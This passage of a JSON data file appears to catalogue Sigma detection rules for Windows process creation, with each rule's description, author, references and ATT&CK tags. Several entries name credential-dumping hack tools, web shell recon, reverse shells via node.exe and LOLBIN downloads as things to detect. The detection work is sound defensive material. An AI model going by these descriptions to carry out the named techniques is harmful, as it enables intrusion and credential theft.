"Unknown" ], "filename": "proc_creation_win_susp_task_folder_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", "https://twitter.com/subTee/status/1216465628946563073", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.execution", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "value": "Tasks Folder Evasion" }, { "description": "Detects a service binary running in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_service_dir.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", "value": "Suspicious Service Binary Directory" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_winrm_awl_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" }, { "description": "Detects usage of winget to add new additional download sources", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "False positive are expected with legitimate sources" ], "filename": "proc_creation_win_winget_add_custom_source.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "value": "Add New Download Source To Winget" }, { "description": "Detects uncommon child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sigverif_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://twitter.com/0gtweet/status/1457676633809330184", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", "value": "Uncommon Sigverif.EXE Child Process" }, { "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement" ] }, "uuid": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "value": "HackTool - Wmiexec Default Powershell Command" }, { "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", "meta": { "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "creation_date": "2022-02-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_rdp_keys_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1021.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", "value": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE" }, { "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_node_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://nodejs.org/api/cli.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "value": "Potential Arbitrary Code Execution Via Node.EXE" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_direct_ip_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml" ], "tags": [ "attack.execution" ] }, "uuid": "5cb299fc-5fb1-4d07-b989-0644c68b6043", "value": "Suspicious File Download From IP Via Curl.EXE" }, { "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "meta": { "author": "Muhammad Faisal", "creation_date": "2023-08-02", "falsepositive": [ "Legitimate activity of system administrators" ], "filename": "proc_creation_win_ssm_agent_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" ], "tags": [ "attack.command-and-control", "attack.persistence", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d20ee2f4-822c-4827-9e15-41500b1fff10", "value": "Potential Amazon SSM Agent Hijacking" }, { "description": "Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), citron_ninja", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel" ], "filename": "proc_creation_win_vscode_tunnel_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90d6bd71-dffb-4989-8d86-a827fedd6624", "value": "Visual Studio Code Tunnel Execution" }, { "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate administrative tasks" ], "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml" ], "tags": [ "attack.execution" ] }, "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "value": "Renamed PsExec Service Execution" }, { "description": "Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"", "meta": { "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], "filename": "proc_creation_win_powershell_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c49c5062-0966-4170-9efd-9968c913a6cf", "value": "Stop Windows Service Via PowerShell Stop-Service" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_malicious_cmdlets.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/adrecon/AzureADRecon", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", "value": "Malicious PowerShell Commandlets - ProcessCreation" }, { "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "creation_date": "2017-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_recon_commands_and_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", "value": "Webshell Detection With Command Line Keywords" }, { "description": "Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.\n", "meta": { "author": "Joseph Kamau", "creation_date": "2024-05-27", "falsepositive": [ "Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed." ], "filename": "proc_creation_win_susp_browser_launch_from_document_reader_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/", "https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_browser_launch_from_document_reader_process.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1193d960-2369-499f-a158-7b50a31df682", "value": "Potential Suspicious Browser Launch From Document Reader Process" }, { "description": "Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\nThis utility can be abused in order to run custom COM object created in the registry.\n", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_xwizard_runwizard_com_object_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html", "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "value": "COM Object Execution via Xwizard.EXE" }, { "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-31", "falsepositive": [ "Another service that uses a single -s command line switch" ], "filename": "proc_creation_win_hktl_wce.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ampliasecurity.com/research/windows-credentials-editor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wce.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", "value": "HackTool - Windows Credential Editor (WCE) Execution" }, { "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "value": "Suspicious Desktopimgdownldr Command" }, { "description": "Detects the use of Windows Defender MpCmdRun.EXE to download files", "meta": { "author": "Matthew Matchen", "creation_date": "2020-09-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mpcmdrun_download_arbitrary_file.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", "value": "File Download Via Windows Defender MpCmpRun.EXE" }, { "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_net_user_add_never_expire.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "value": "New User Created Via Net.EXE With Never Expire Option" }, { "description": "Detects the Installation of a Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", "value": "MSExchange Transport Agent Installation" }, { "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "value": "HackTool - CrackMapExec Process Patterns" }, { "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", "value": "Powershell Base64 Encoded MpPreference Cmdlet" }, { "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-29", "falsepositive": [ "Programs that use the same command line flags" ], "filename": "proc_creation_win_hktl_sharpldapwhoami.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bugch3ck/SharpLdapWhoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "value": "HackTool - SharpLdapWhoami Execution" }, { "description": "Detects a potentially suspicious execution of a parent process located in the \"\\Users\\Public\" folder executing a child process containing references to shell or scripting binaries and commandlines.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1564", "attack.t1059" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "value": "Potentially Suspicious Execution From Parent Process In Public Folder" }, { "description": "Detection of unusual child processes by different system processes", "meta": { "author": "Semanur Guneysu @semanurtg, oscd.community", "creation_date": "2020-10-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_abusing_debug_privilege.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", "value": "Abused Debug Privilege by Arbitrary Parent Processes" }, { "description": "Detects the execution of the \"cloudflared\" binary from a non standard location.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate usage of Cloudflared portable versions" ], "filename": "proc_creation_win_cloudflared_portable_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", 